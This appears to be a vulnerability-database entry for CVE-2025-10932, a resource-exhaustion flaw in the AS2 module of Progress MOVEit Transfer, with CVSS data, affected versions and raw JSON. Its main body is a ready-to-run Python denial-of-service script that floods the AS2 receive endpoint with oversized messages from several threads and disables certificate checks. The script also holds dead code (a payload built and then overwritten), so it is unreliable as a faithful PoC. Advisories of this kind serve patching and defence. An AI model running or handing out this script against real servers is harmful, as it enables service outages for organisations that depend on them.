Security Vulnerability Report
CVE-2025-10932 CVSS 8.2 HIGH

Published: 2025-10-29 15:15:41
Last Modified: 2026-04-15 00:35:42

Description

Uncontrolled Resource Consumption vulnerability in Progress MOVEit Transfer (AS2 module). This issue affects MOVEit Transfer: from 2025.0.0 before 2025.0.3, from 2024.1.0 before 2024.1.7, from 2023.1.0 before 2023.1.16.

CVSS Details

CVSS Score: 8.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

No configuration data available.

MOVEit Transfer 2025.0.0 - 2025.0.2 (upgrade to 2025.0.3 or later required)
MOVEit Transfer 2024.1.0 - 2024.1.6 (upgrade to 2024.1.7 or later required)
MOVEit Transfer 2023.1.0 - 2023.1.15 (upgrade to 2023.1.16 or later required)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-10932 PoC - MOVEit Transfer AS2 Resource Consumption
# This PoC demonstrates sending large AS2 messages to trigger resource exhaustion
import requests
import time
import threading

TARGET_URL = "https://target-server/moveit/as2/Receive.aspx"


def send_large_as2_message(message_size_mb=50):
    """Send oversized AS2 message to trigger resource consumption"""
    headers = {
        'Content-Type': 'application/EDIFACT',
        'AS2-Version': '1.2',
        'AS2-From': 'ATTACKER_PARTNER',
        'AS2-To': 'VICTIM_PARTNER',
        'Message-ID': '[email protected]',
        'Content-Transfer-Encoding': 'binary'
    }
    # Generate large payload to exhaust server resources
    large_payload = b'UNB+UNOC:3+SENDER:ZZ+RECEIVER:ZZ+{}+UNB++EDIINT'
    timestamp = time.strftime('%Y%m%d%H%M%S')
    large_payload = (timestamp + '++EANCOM').encode() * (message_size_mb * 1024)
    try:
        response = requests.post(
            TARGET_URL,
            headers=headers,
            data=large_payload,
            timeout=30,
            verify=False
        )
        return response.status_code
    except requests.exceptions.RequestException as e:
        return str(e)


def concurrent_attack(num_threads=10, message_size=50):
    """Launch concurrent attacks from multiple threads"""
    threads = []
    for i in range(num_threads):
        t = threading.Thread(
            target=send_large_as2_message,
            args=(message_size,)
        )
        threads.append(t)
        t.start()
    for t in threads:
        t.join()


if __name__ == '__main__':
    print("Starting CVE-2025-10932 PoC...")
    print(f"Target: {TARGET_URL}")
    concurrent_attack(num_threads=5, message_size=100)
    print("Attack completed. Check server availability.")

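References

https://community.progress.com/s/article/MOVEit-Transfer-Vulnerability-CVE-2025-10932-October-29-2025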

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10932", "sourceIdentifier": "[email protected]", "published": "2025-10-29T15:15:41.227", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Uncontrolled Resource Consumption vulnerability in Progress MOVEit Transfer (AS2 module).This issue affects MOVEit Transfer: from 2025.0.0 before 2025.0.3, from 2024.1.0 before 2024.1.7, from 2023.1.0 before 2023.1.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://community.progress.com/s/article/MOVEit-Transfer-Vulnerability-CVE-2025-10932-October-29-2025", "source": "[email protected]"}]}}